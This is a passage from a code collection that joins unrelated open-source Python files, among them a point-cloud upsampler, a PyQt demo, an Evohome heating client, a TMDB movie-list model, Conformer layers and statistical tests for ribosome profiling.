farthest_point_sample(self.num_point, inputs))\n B = inputs.get_shape()[0].value\n N = inputs.get_shape()[1].value\n C = inputs.get_shape()[2].value\n\n point_features = recurrent_context_encoding(inputs, scope=\"recurrent_context_encoding\",\n is_training=self.is_training, bn_decay=None)\n\n coarse, coarse_feat = hierarchical_feature_expansion(point_features, scope=\"hierarchical_feature_expansion\",\n is_training=self.is_training, bn_decay=None)\n\n with tf.variable_scope(self.name + \"/refine\", reuse=self.reuse):\n fine_feat = recurrent_context_encoding(coarse, scope=\"recurrent_context_encoding\",\n is_training=self.is_training, bn_decay=None, knn_list=[4, 8])\n fine_feat = tf.concat([fine_feat, coarse_feat], axis=-1)\n\n fine_feat = conv1d(fine_feat, 128, 1,\n padding='VALID', scope='layer3_prep', is_training=self.is_training, bn=use_bn,\n ibn=use_ibn,\n bn_decay=None)\n\n fine_feat = conv1d(fine_feat, 64, 1,\n padding='VALID', scope='layer4_prep', is_training=self.is_training, bn=use_bn,\n ibn=use_ibn,\n bn_decay=None)\n\n fine = conv1d(fine_feat, 3, 1,\n padding='VALID', scope='layer5_prep', is_training=self.is_training, bn=use_bn,\n ibn=use_ibn,\n bn_decay=None, activation_fn=None)\n\n fine = coarse + fine\n\n self.variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.name)\n\n return coarse, fine\n","repo_name":"LiuXinchen1997/PCVisAPP","sub_path":"PointCloudManage/upsample_op/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73028961973","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport sys\nimport textrank\n\nDEBUG = False # True\n\n## Stage 2:\n## * collect and normalize the key phrases from a parsed document\n##\n## INPUTS: \n## OUTPUT: JSON format `RankedLexeme(text, rank, ids, pos)`\n\nif __name__ == \"__main__\":\n path = sys.argv[1]\n graph, ranks = textrank.text_rank(path)\n\n textrank.render_ranks(graph, ranks)\n\n # output as JSON\n\n for rl in textrank.normalize_key_phrases(path, ranks):\n print(textrank.pretty_print(rl._asdict()))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ceteri_pytextrank/pytextrank-master/stage2.py","file_name":"stage2.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"74560559732","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Time : 2/9/18 2:49 PM\n# Author : Jack Huang\n# Email : jackhuang719668276@163.com\n# File : 01_sigslot.py\n# About : \n# 1. 信号和槽\n# 2. \n# 3. \n\n\nimport sys\nfrom PyQt4 import QtGui, QtCore\n\n\nclass Example(QtGui.QWidget):\n\n def __init__(self):\n super(Example, self).__init__()\n\n self.initUI()\n\n def initUI(self):\n\n # 一个LCD屏\n lcd = QtGui.QLCDNumber(self)\n # 一个水平滑动条\n slider = QtGui.QSlider(QtCore.Qt.Horizontal, self)\n\n # 一个框布局\n vbox = QtGui.QVBoxLayout()\n # 添加上面两个元素到布局中去\n vbox.addWidget(lcd)\n vbox.addWidget(slider)\n\n self.setLayout(vbox)\n # 连接信号和槽\n # connect 方法有4个参数, sender 是发送信号的对象, signal 是发射的信号\n # receiver 是接收信号的对象, 最后, slog 是对信号反应的方法。\n self.connect(slider, QtCore.SIGNAL('valueChanged(int)'), lcd,\n QtCore.SLOT('display(int)'))\n self.setWindowTitle(u'信号 & 槽')\n self.resize(250, 150)\n\n\napp = QtGui.QApplication(sys.argv)\nex = Example()\nex.show()\nsys.exit(app.exec_())","repo_name":"HuangJiaLian/LearnPyQT4","sub_path":"3_Event_Signal/01_sigslot.py","file_name":"01_sigslot.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6504363820","text":"from collections import Counter\n\n\ndef get_probs(occurrences):\n \"\"\"\n Computes conditional probabilities based on frequency of co-occurrences\n\n Parameters\n ----------\n occurrences: occurences[x][y] number of times with (X=x and Y=y)\n\n Returns\n -------\n probs : probs[x][y] = Pr(Y=y | X=x)\n reverse_probs : reverse_probs[y][x] = Pr(X=x | Y=y)\n \"\"\"\n probs = {}\n reverse_probs = {}\n y_occ = Counter()\n for x, ys in occurrences.items():\n total = sum(ys.values())\n probs[x] = {}\n for y, occ in ys.items():\n probs[x][y] = occ / total\n y_occ[y] += occ\n for x, ys in occurrences.items():\n for y, occ in ys.items():\n reverse_probs.setdefault(y, {})[x] = occ / y_occ[y]\n\n return probs, reverse_probs\n\n\ndef reverse_probs(probs):\n \"\"\"\n Reverses the conditional probability assuming that variables are uniformly distributed\n\n Parameters\n ----------\n probs : probs[x][y] = Pr(Y=y | X=x)\n\n Returns\n -------\n reverse : reverse[y][x] = Pr(X=x | Y=y) assuming X is uniform\n \"\"\"\n reverse = {}\n for x, probs_x in probs.items():\n for y, p in probs_x.items():\n reverse.setdefault(y, {})[x] = p\n for y, probs_y in reverse.items():\n norm = sum(probs_y.values())\n for x, p in probs_y.items():\n probs_y[x] = p / norm\n return reverse\n","repo_name":"paperswithcode/axcell","sub_path":"axcell/models/linking/probs.py","file_name":"probs.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":365,"dataset":"github-code","pt":"21"} +{"seq_id":"23673923837","text":"def ficha(nome,gols):\n print(f\"O nome do jogadoe é : {nome}\")\n print(f\"{nome} fez o total de {gols} gols:\") \n\n\nnome_a = str(input(\"Digite o nome do jogador :\"))\ngols_a = int(input(\"Digite a quantidade de gols :\"))\n\n\nficha(nome_a,gols_a)\n","repo_name":"ttgomes/Blueedtech","sub_path":"exercicio 5 aula 7.py","file_name":"exercicio 5 aula 7.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32776819096","text":"\"\"\"Provides handling of a control system.\"\"\"\nimport json\nimport logging\n\nimport requests\n\nfrom .hotwater import HotWater\nfrom .zone import Zone\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass ControlSystem(\n object\n): # pylint: disable=useless-object-inheritance, too-many-instance-attributes\n \"\"\"Provides handling of a control system.\"\"\"\n\n def __init__(self, client, location, gateway, data=None):\n \"\"\"Initialise the class.\"\"\"\n self.client = client\n self.location = location\n self.gateway = gateway\n\n self._zones = []\n self.zones = {}\n self.zones_by_id = {}\n self.hotwater = None\n self.systemId = None # pylint: disable=invalid-name\n\n if data is not None:\n local_data = dict(data)\n del local_data[\"zones\"]\n self.__dict__.update(local_data)\n\n for z_data in data[\"zones\"]:\n zone = Zone(client, z_data)\n self._zones.append(zone)\n self.zones[zone.name] = zone\n self.zones_by_id[zone.zoneId] = zone\n\n if \"dhw\" in data:\n self.hotwater = HotWater(client, data[\"dhw\"])\n\n def _set_status(self, mode, until=None):\n # pylint: disable=protected-access\n headers = dict(self.client._headers())\n headers[\"Content-Type\"] = \"application/json\"\n\n if until is None:\n data = {\"SystemMode\": mode, \"TimeUntil\": None, \"Permanent\": True}\n else:\n data = {\n \"SystemMode\": mode,\n \"TimeUntil\": until.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n \"Permanent\": False,\n }\n\n response = requests.put(\n \"https://tccna.honeywell.com/WebAPI/emea/api/v1\"\n \"/temperatureControlSystem/%s/mode\" % self.systemId,\n data=json.dumps(data),\n headers=headers,\n timeout=self.location.timeout,\n )\n response.raise_for_status()\n\n def set_status(self, mode, until=None):\n \"\"\"Set the system to a mode, either indefinitely, or for a set time.\"\"\"\n self._set_status(mode, until)\n\n def set_status_normal(self):\n \"\"\"Set the system into normal mode.\"\"\"\n self._set_status(\"Auto\")\n\n def set_status_reset(self):\n \"\"\"Reset the system into normal mode.\n\n This will also set all the zones to FollowSchedule mode.\n \"\"\"\n self._set_status(\"AutoWithReset\")\n\n def set_status_custom(self, until=None):\n \"\"\"Set the system into custom mode.\"\"\"\n self._set_status(\"Custom\", until)\n\n def set_status_eco(self, until=None):\n \"\"\"Set the system into eco mode.\"\"\"\n self._set_status(\"AutoWithEco\", until)\n\n def set_status_away(self, until=None):\n \"\"\"Set the system into away mode.\"\"\"\n self._set_status(\"Away\", until)\n\n def set_status_dayoff(self, until=None):\n \"\"\"Set the system into dayoff mode.\"\"\"\n self._set_status(\"DayOff\", until)\n\n def set_status_heatingoff(self, until=None):\n \"\"\"Set the system into heating off mode.\"\"\"\n self._set_status(\"HeatingOff\", until)\n\n def temperatures(self):\n \"\"\"Return a generator with the details of each zone.\"\"\"\n self.location.status()\n\n if self.hotwater:\n # pylint: disable=no-member\n yield {\n \"thermostat\": \"DOMESTIC_HOT_WATER\",\n \"id\": self.hotwater.dhwId,\n \"name\": \"\",\n \"temp\": self.hotwater.temperatureStatus[\"temperature\"],\n \"setpoint\": \"\",\n }\n\n for zone in self._zones:\n zone_info = {\n \"thermostat\": \"EMEA_ZONE\",\n \"id\": zone.zoneId,\n \"name\": zone.name,\n \"temp\": None,\n \"setpoint\": zone.setpointStatus[\"targetHeatTemperature\"],\n }\n\n if zone.temperatureStatus[\"isAvailable\"]:\n zone_info[\"temp\"] = zone.temperatureStatus[\"temperature\"]\n yield zone_info\n\n def zone_schedules_backup(self, filename):\n \"\"\"Backup all zones on control system to the given file.\"\"\"\n _LOGGER.info(\n \"Backing up schedules from ControlSystem: %s (%s)...\",\n self.systemId,\n self.location.name,\n )\n\n schedules = {}\n\n if self.hotwater:\n _LOGGER.info(\"Retrieving DHW schedule: %s...\", self.hotwater.zoneId)\n\n schedule = self.hotwater.schedule()\n schedules[self.hotwater.zoneId] = {\n \"name\": \"Domestic Hot Water\",\n \"schedule\": schedule,\n }\n\n for zone in self._zones:\n zone_id = zone.zoneId\n name = zone.name\n\n _LOGGER.info(\"Retrieving Zone schedule: %s - %s\", zone_id, name)\n\n schedule = zone.schedule()\n schedules[zone_id] = {\"name\": name, \"schedule\": schedule}\n\n schedule_db = json.dumps(schedules, indent=4)\n\n _LOGGER.info(\"Writing to backup file: %s...\", filename)\n with open(filename, \"w\") as file_output:\n file_output.write(schedule_db)\n\n _LOGGER.info(\"Backup completed.\")\n\n def zone_schedules_restore(self, filename):\n \"\"\"Restore all zones on control system from the given file.\"\"\"\n _LOGGER.info(\n \"Restoring schedules to ControlSystem %s (%s)...\",\n self.systemId,\n self.location,\n )\n\n _LOGGER.info(\"Reading from backup file: %s...\", filename)\n with open(filename, \"r\") as file_input:\n schedule_db = file_input.read()\n schedules = json.loads(schedule_db)\n\n for zone_id, zone_schedule in schedules.items():\n name = zone_schedule[\"name\"]\n zone_info = zone_schedule[\"schedule\"]\n\n _LOGGER.info(\"Restoring schedule for: %s - %s...\", zone_id, name)\n\n if self.hotwater and self.hotwater.zoneId == zone_id:\n self.hotwater.set_schedule(json.dumps(zone_info))\n else:\n self.zones_by_id[zone_id].set_schedule(json.dumps(zone_info))\n\n _LOGGER.info(\"Restore completed.\")\n","repo_name":"watchforstock/evohome-client","sub_path":"evohomeclient2/controlsystem.py","file_name":"controlsystem.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"21"} +{"seq_id":"41886504096","text":"from .extractor import extract_forms\nfrom .models import Adverb, FormAnalysis\nfrom .regexes import remove_html_tags, ADV_HEADWORD\n\n\ndef create_adverb(s):\n match = ADV_HEADWORD.match(s)\n if match:\n headword = remove_html_tags(match.group(1))\n definition = remove_html_tags(match.group(2))\n post_definition = s[match.end(2) + 2:].lstrip()\n\n # Special case when no definition is given, but only forms/loci\n if not definition:\n post_definition = s[match.end(1) + 2:].lstrip()\n definition = ''\n if not post_definition and definition[0].islower():\n post_definition = definition\n definition = ''\n\n adverb = Adverb(headword, definition)\n fa = FormAnalysis(adverb)\n fa.set_forms(extract_forms(post_definition))\n adverb.add_form_analysis(fa)\n return adverb\n else:\n raise ValueError('This is not an Adverb')\n","repo_name":"UUDigitalHumanitieslab/wurzburg-glosses-extraction","sub_path":"extractor/advextractor.py","file_name":"advextractor.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39733484675","text":"\"\"\"add answer text\n\nRevision ID: f8a6a6d9865f\nRevises: 3adad33e0907\nCreate Date: 2022-10-04 19:26:15.308292\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f8a6a6d9865f'\ndown_revision = '3adad33e0907'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('answer', sa.Column('answer', sa.String(), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('answer', 'answer')\n # ### end Alembic commands ###\n","repo_name":"mirea-ninja/online-quest-backend","sub_path":"alembic/versions/f8a6a6d9865f_add_answer_text.py","file_name":"f8a6a6d9865f_add_answer_text.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10407050964","text":"def pair_sum(arr,k):\n if len(arr)<2:\n print('Array is too small')\n return\n seen=set()\n output=set()\n\n for num in arr:\n target=k-num\n if target not in seen:\n seen.add(num)\n else:\n output.add((min(num,target),max(num,target)))\n\n for a,b in output:\n print(a,b)\n\npair_sum([1,2,3,4,2,2],4)","repo_name":"urguru/python-algorithms-py","sub_path":"pair_sum.py","file_name":"pair_sum.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12263481831","text":"import torch\nimport torch.nn as nn\nfrom typing import Tuple\nfrom .activation import Swish, GLU\nfrom .modules import Transpose\n\nclass DepthwiseConv1d(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n kernel_size: int,\n stride: int = 1,\n padding: int = 0,\n bias: bool = False,\n )->None:\n super(DepthwiseConv1d, self).__init__()\n assert out_channels % in_channels == 0, \"out_channels should be constant multiple of in_channels\"\n self.conv = nn.Conv1d(\n in_channels = in_channels,\n out_channels = out_channels,\n kernel_size = kernel_size,\n groups = in_channels,\n stride = stride,\n padding = padding,\n bias = bias\n )\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n return self.conv(inputs)\n \nclass PointwiseConv1d(nn.Module):\n def __init__(self,\n in_channels:int,\n out_channels:int,\n stride:int=1,\n padding: int=0,\n bias: bool = True)->None:\n super(PointwiseConv1d, self).__init__()\n self.conv=nn.Conv1d(\n in_channels = in_channels,\n out_channels = out_channels,\n kernel_size = 1,\n stride = stride,\n padding = padding,\n bias = bias\n )\n \n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n return self.conv(inputs)\n \n\nclass ConformerConvModule(nn.Module):\n def __init__(self,\n in_channels: int,\n kernel_size: int = 31,\n expansion_factor: int = 2,\n dropout_p: float = 0.1)->None:\n super(ConformerConvModule, self).__init__()\n assert (kernel_size - 1)%2 ==0, \"kernel_size should be a odd number\"\n assert expansion_factor == 2\n\n self.sequential = nn.Sequential(\n nn.LayerNorm(in_channels),\n Transpose(shape=(1, 2)),\n PointwiseConv1d(in_channels, in_channels*expansion_factor, stride=1, padding=0, bias=True),\n GLU(dim=1),\n DepthwiseConv1d(in_channels, in_channels, kernel_size, stride=1, padding = (kernel_size-1)//2),\n nn.BatchNorm1d(in_channels),\n Swish(),\n PointwiseConv1d(in_channels, in_channels, stride=1, padding=0, bias=True),\n nn.Dropout(p=dropout_p),\n )\n\n def forward(self,inputs:torch.Tensor) -> torch.Tensor:\n return self.sequential(inputs).transpose(1,2)\n\n\n \n","repo_name":"Plutoisme/PytorchStudy","sub_path":"conformer/convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24030405239","text":"import tmdbsimple as tmdb\nfrom dotenv import load_dotenv\nfrom PySide6.QtCore import QAbstractListModel, QSortFilterProxyModel, Qt, QModelIndex, QObject, QRunnable, \\\n QThreadPool, Signal, QUrl, Slot, Property\nimport os, shutil, time\nfrom os.path import expanduser\nfrom datetime import datetime\nfrom Utilities.downloader import download_image\n\nUSER_HOME = expanduser(\"~\")\nCACHE_FOLDER = os.path.join(USER_HOME, \"TMDB_CACHE\")\n\n# get absolute path (\"~to .env\nENV_PATH = os.path.dirname(__file__).replace(\"Modules\", \".env\")\n\n# load .env to os env\nload_dotenv(ENV_PATH)\n\n# configure our API_KEY\ntmdb.API_KEY = os.getenv(\"TMDB_API_KEY\")\n\n\nclass MovieList(QAbstractListModel):\n DataRole = Qt.UserRole\n movie_list_changed = Signal()\n download_progress_changed = Signal()\n\n def __init__(self):\n super(MovieList, self).__init__()\n\n self.pool = QThreadPool()\n self.pool.setMaxThreadCount(1)\n self.movie_list_worker = MovieListWorker()\n\n self._items = []\n self._fetch()\n\n def _fetch(self):\n self._reset()\n\n self.movie_list_worker = MovieListWorker()\n\n self.movie_list_worker.is_working = True\n self.download_progress_changed.emit()\n\n self.movie_list_worker.signals.download_process_stopped.connect(self._refresh_process_continues)\n self.movie_list_worker.signals.movie_data_downloaded.connect(self._insert_movie)\n self.movie_list_worker.signals.download_process_finished.connect(self._download_process_finished)\n self.pool.start(self.movie_list_worker)\n\n def _download_process_finished(self):\n self.download_progress_changed.emit()\n\n def _reset(self):\n self.beginResetModel()\n self._items.clear()\n self.movie_list_changed.emit()\n self.endResetModel()\n\n @Slot()\n def refresh_list(self):\n if self.movie_list_worker.is_working:\n self.movie_list_worker.stop()\n else:\n self._refresh_process_continues()\n\n def _refresh_process_continues(self):\n # delete cache folder\n if os.path.exists(CACHE_FOLDER):\n shutil.rmtree(CACHE_FOLDER, ignore_errors=True)\n\n self._reset()\n self._fetch()\n\n def _insert_movie(self, movie_data):\n self.beginInsertRows(QModelIndex(), self.rowCount(), self.rowCount())\n self._items.append(self._serializer(movie_data))\n self.movie_list_changed.emit()\n self.endInsertRows()\n\n def _serializer(self, movie_data):\n def get_formatted_date():\n datetime_obj = datetime.strptime(movie_data.get(\"release_date\"), \"%Y-%m-%d\")\n return datetime_obj.strftime(\"%Y %b. %d\")\n\n return {\n \"id\": movie_data[\"id\"],\n \"poster\": QUrl().fromLocalFile(movie_data[\"local_poster\"]),\n \"title\": movie_data[\"title\"],\n \"date\": get_formatted_date(),\n \"sort_date\": datetime.strptime(movie_data.get(\"release_date\"), \"%Y-%m-%d\"),\n \"rating\": int(movie_data[\"vote_average\"] * 10),\n \"overview\": movie_data[\"overview\"]\n }\n\n def rowCount(self, parent=QModelIndex):\n return len(self._items)\n\n def data(self, index, role=Qt.DisplayRole):\n row = index.row()\n if role == MovieList.DataRole:\n return self._items[row]\n\n def roleNames(self):\n return {\n MovieList.DataRole: b'movie_item'\n }\n\n def _get_is_downloading(self):\n print(f\"_get_is_downloading {self.movie_list_worker.is_working}\")\n return self.movie_list_worker.is_working\n\n def _get_movie_count(self):\n return len(self._items)\n\n is_downloading = Property(bool, _get_is_downloading, notify=download_progress_changed)\n movie_count = Property(int, _get_movie_count, notify=movie_list_changed)\n\n\nclass MovieListProxy(QSortFilterProxyModel):\n sorting_changed = Signal()\n\n def __init__(self):\n super(MovieListProxy, self).__init__()\n self.sort(0, Qt.AscendingOrder)\n\n self._filter = \"\"\n self._sort_mode = \"title\"\n\n self.sorting_changed.emit()\n\n @Slot(str)\n def set_filter(self, movie_name):\n self._filter = movie_name\n self.invalidateFilter()\n\n @Slot(str)\n def set_current_sorting(self, sort_mode):\n # check if sort mode is the same as previously\n if sort_mode == self._sort_mode:\n # check current sortOrder()\n if self.sortOrder() == Qt.AscendingOrder:\n self.sort(0, Qt.DescendingOrder)\n else:\n self.sort(0, Qt.AscendingOrder)\n else:\n self.sort(0, Qt.AscendingOrder)\n\n self._sort_mode = sort_mode\n self.sorting_changed.emit()\n self.invalidate()\n\n def filterAcceptsRow(self, source_row: int, source_parent: QModelIndex) -> bool:\n movie_data = self.sourceModel()._items[source_row]\n\n return self._filter.lower() in movie_data[\"title\"].lower()\n\n def lessThan(self, source_left, source_right) -> bool:\n left_movie = self.sourceModel().data(source_left, Qt.UserRole)\n right_movie = self.sourceModel().data(source_right, Qt.UserRole)\n\n if self._sort_mode == \"date\":\n return left_movie[\"sort_date\"] < right_movie[\"sort_date\"]\n\n return left_movie[self._sort_mode] < right_movie[self._sort_mode]\n\n def _get_current_sorting(self):\n return self._sort_mode\n\n def _get_sort_direction(self):\n if self.sortOrder() == Qt.AscendingOrder:\n return 0\n return 180\n\n current_sorting = Property(str, _get_current_sorting, notify=sorting_changed)\n sort_direction = Property(int, _get_sort_direction, notify=sorting_changed)\n\n\nclass WorkerSignals(QObject):\n download_process_started = Signal()\n download_process_stopped = Signal()\n download_process_finished = Signal()\n movie_data_downloaded = Signal(dict)\n\n def __init__(self):\n super(WorkerSignals, self).__init__()\n\n\nclass MovieListWorker(QRunnable):\n def __init__(self):\n super(MovieListWorker, self).__init__()\n self.signals = WorkerSignals()\n\n self._movies = tmdb.Movies()\n self.is_working = False\n\n def _check_movie(self, movie_data):\n if not movie_data.get(\"poster_path\"):\n return False\n\n if not movie_data.get(\"vote_average\"):\n return False\n\n if not movie_data.get(\"backdrop_path\"):\n return False\n\n if not movie_data.get(\"release_date\"):\n return False\n\n return True\n\n def _cache_data(self):\n if not self.is_working:\n self.signals.download_process_stopped.emit()\n return\n\n self.signals.download_process_started.emit()\n\n if not os.path.exists(CACHE_FOLDER):\n os.makedirs(CACHE_FOLDER)\n\n for movie_data in self._movies.popular(page=1)[\"results\"]:\n if not self.is_working:\n print(\"Download process stopped!\")\n self.signals.download_process_stopped.emit()\n break\n\n if not self._check_movie(movie_data):\n continue\n\n local_poster_path = download_image(movie_data[\"poster_path\"], CACHE_FOLDER)\n if not local_poster_path:\n continue\n\n movie_data[\"local_poster\"] = local_poster_path\n\n # time.sleep(0.2)\n self.signals.movie_data_downloaded.emit(movie_data)\n\n print(\"Download finished.\")\n self.is_working = False\n self.signals.download_process_finished.emit()\n\n def stop(self):\n self.is_working = False\n\n def run(self):\n print(\"Download started...\")\n self.is_working = True\n self._cache_data()\n\n\nif __name__ == '__main__':\n MovieList()","repo_name":"robertvari/TMDB_210612","sub_path":"Modules/movie_list.py","file_name":"movie_list.py","file_ext":"py","file_size_in_byte":7755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32957143333","text":"import os\nimport random\n\ndef getRandomReviews(filename_r , filename_w , rev_req ):\n\trev_req = int( rev_req/2)\n\tfeature_file = open( filename_r , \"r\")\n\tf1 = feature_file.readlines() # feature vectors for reviews\n\tnum_lines = 0\n\tall_lines = []\n\tpos_lines = []\n\tneg_lines = []\n\tpos_rev = [] #randomly selected\n\tneg_rev = [] #randomly selected\n\tfor line in f1:\n\t\tnum_lines +=1\n\t\tall_lines.append(line)\n\t\n\tfor i in range(int(num_lines/2)):\n\t\tpos_lines.append(all_lines[i])\n\t\t\n\tfor i in range(int(num_lines/2)):\n\t\tneg_lines.append(all_lines[int(num_lines/2) + i])\n\t\n\trandom.shuffle(pos_lines)\n\trandom.shuffle(neg_lines)\n\n\tmy_rev = open(filename_w, \"a\")\n\tfor i in pos_lines[:rev_req]:\n\t\tmy_rev.write(str(i))\n\t\t\n\tfor i in neg_lines[:rev_req]:\n\t\tmy_rev.write(str(i))\n\t\n\tmy_rev.close()\n\nif __name__ ==\"__main__\":\n\tif os.path.exists(\"data.txt\"):\n\t\tos.remove(\"data.txt\")\n\t#a = open(\"data.txt\" , \"a\")\n\t#a.close()\n\tgetRandomReviews(\"../project1/aclImdb/train/labeledBow.feat\" , \"data.txt\" , 1000 )\n\tgetRandomReviews(\"../project1/aclImdb/test/labeledBow.feat\" , \"data.txt\" , 1000 )\n\t\n","repo_name":"prerna-grg/Btech-Course-assignments","sub_path":"Machine Learning/Sentiment-Classification-master/gen_set.py","file_name":"gen_set.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9652113227","text":"import numpy as np\nimport pandas as pd\n\nfrom scipy.stats import wilcoxon, binomtest, f\nimport statsmodels.formula.api as smf \nimport statsmodels.api as sm\nimport statsmodels.tools.sm_exceptions as sme\n\nfrom scipy.special import digamma,polygamma\nfrom scipy.stats import nbinom\n\nlibmtspec = True\ntry:\n from mtspec import mtspec\nexcept ModuleNotFoundError:\n libmtspec = False\n\n\n\ndef get_2D_matrix (psites):\n \"\"\"converts from 1D array to 2D matrix\"\"\"\n \n mat = np.reshape (psites, (int (len(psites)/3), 3))\n \n return (mat)\n\n\n\ndef get_counts (psites):\n \"\"\"counts number of p-sites in each frame\"\"\"\n\n mat = get_2D_matrix (psites)\n\n return ({\n 'total' : np.sum(mat),\n 'frame0' : np.sum(mat[:,0]),\n 'frame1' : np.sum(mat[:,1]),\n 'frame2' : np.sum(mat[:,2])\n })\n\n\ndef get_taper (psites, time_bandwidth = 3, ntapers = \"default\", nfft = \"default\"):\n \"\"\"Performs multitaper analysis (as in ribotaper) with Ftest statistics for 1/3 frequency\n psites: 1D array (ORF length) with P-site counts ncodons\n returns: p-value\n \"\"\"\n\n if sum (psites) == 0:\n return (np.nan)\n\n if nfft == \"default\":\n nfft = int(2 * 2**np.ceil(np.log2(len(psites))))\n\n if ntapers == \"default\":\n ntapers = int(2*time_bandwidth) - 1\n\n # Calculate the spectral estimation.\n spec, freq, jackknife, fstatistics, _ = mtspec(data=np.array(psites), delta = 1, time_bandwidth = time_bandwidth, number_of_tapers=ntapers, nfft=nfft, statistics=True, rshape=0)\n\n m = int(np.round (nfft/3))\n sf = f.sf (fstatistics[m],dfn=2,dfd=(2*ntapers)-2)\n return (sf)\n\n\ndef get_wilcox (mat):\n \"\"\"\n Paired wilcoxon-test for frame0 > mean (frame1, frame2)\n mat: 2D matrix with shape (3, ncodons)\n returns: p-value\n \"\"\"\n\n frame0 = mat[:,0]\n frame12 = np.mean (mat[:,1:3], axis=1)\n\n #wilcox_stat, wilcox_p = wilcoxon(frame0, frame12, alternative=\"greater\") if not np.all (frame0-frame12==0) else (np.nan, np.nan)\n wilcox_stat, wilcox_p = wilcoxon(frame0 - frame12, alternative=\"greater\") if not np.all (frame0-frame12==0) else (np.nan, np.nan)\n return (wilcox_p)\n\n\n\ndef get_binom (mat):\n \"\"\"\n Perform binomial-test for n(frame0 > frame1 and frame0 > frame2). Adding random noise to reduce draw-bias, otherwise on-frame is max on draw\n mat: 2D matrix with shape (3, ncodons)\n returns: p-value\n \"\"\"\n\n\n mat = mat + np.random.uniform(low=0.0, high=0.99, size=mat.shape)\n\n index_max = np.argmax (mat, axis=1)\n binom_p = binomtest (k=np.sum (index_max == 0), n=len(index_max), p=1/3, alternative=\"greater\").pvalue if len (index_max) > 0 else np.nan\n return (binom_p)\n\n\ndef get_theta_md (y, limit=20, eps = np.finfo(float).eps**.25):\n \"\"\"estimates theta for nb GLM - adapted from theta.md (MASS package, R)\"\"\"\n\n y = np.array (y)\n mu = np.mean (y)\n dfr = y.shape[0] - 2\n\n weights = np.ones (len(y))\n n = np.sum(weights) \n t0 = n/np.sum(weights * (y/mu - 1)**2)\n nmax = [np.max ([1,p]) for p in y]\n a = 2 * np.sum(weights * y * np.log(nmax/mu)) - dfr\n\n it = 0\n idel = 1\n while (it + 1 < limit and np.abs(idel) > eps and not np.isnan (t0)):\n it = it+1\n t0 = np.abs(t0)\n tmp = np.log((y + t0)/(mu + t0))\n top = a - 2 * np.sum(weights * (y + t0) * tmp)\n bot = 2 * np.sum(weights * ((y - mu)/(mu + t0) - tmp))\n idel = top/bot\n t0 = t0 - idel\n \n if t0 <= 0 or np.isnan (t0) or np.isinf (t0):\n t0 = 1 # default alpha in statsmodels nb glm\n \n return (t0)\n\n\ndef get_theta_ml (y, limit = 10, eps = np.finfo(float).eps**.25, trace = False): \n \"\"\"estimates theta for nb GLM - adapted from theta.ml (MASS package, R)\"\"\"\n \n def score (n, th, mu, y, w):\n return (sum(w * (digamma(th + y) - digamma(th) + np.log(th) + 1 - np.log(th + mu) - (y + th)/(mu + th))))\n \n def info (n, th, mu, y, w):\n return (sum(w * (-polygamma(1, th + y) + polygamma(1, th) - 1/th + 2/(mu + th) - (y + th)/(mu + th)**2)))\n\n try:\n mu = np.mean (y)\n\n weights = np.ones ((len (y)))\n n = np.sum(weights)\n \n t0 = n/sum(weights * (y/mu - 1)**2)\n it = 0\n idel = 1\n \n if (trace): \n print (\"theta.ml: iter\", it, \"theta\", t0)\n \n while (it < limit and abs(idel) > eps):\n \n t0 = abs (t0)\n i = info (n, t0, mu, y, weights)\n idel = score(n, t0, mu, y, weights) / i\n t0 = t0 + idel\n it = it+1\n \n if t0 <= 0 or np.isnan (t0) or np.isinf (t0):\n t0 = 1\n \n if it == limit and trace: \n print (\"iteration limit reached\")\n \n return (t0)\n\n except ZeroDivisionError:\n return (1)\n\n \n\n\ndef convert_params(mu, theta):\n \"\"\"\n Convert mean/dispersion parameterization of a negative binomial to the ones scipy supports\n See https://en.wikipedia.org/wiki/Negative_binomial_distribution#Alternative_formulations\n \"\"\"\n r = theta\n var = mu + 1 / r * mu ** 2\n p = (var - mu) / var\n return r, 1 - p\n\n\ndef pmf(counts, mu, theta):\n \"\"\"\n \"\"\"\n return nbinom.pmf(counts, *convert_params(mu, theta))\n\n\n\ndef get_glm (mat, 